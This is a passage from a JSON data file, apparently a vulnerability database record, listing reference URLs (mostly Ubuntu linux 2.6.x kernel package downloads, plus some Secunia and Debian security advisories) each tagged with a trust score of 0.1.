        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/43315/#comments"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43315"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/vim/section_179/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/43315/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/39830/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/39830/#comments"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=39830"
      },
      {
        "trust": 0.1,
        "url": "http://lists.debian.org/debian-security-announce/2010/msg00096.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/evm/trial/"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.36.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-server_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-386_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.36.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
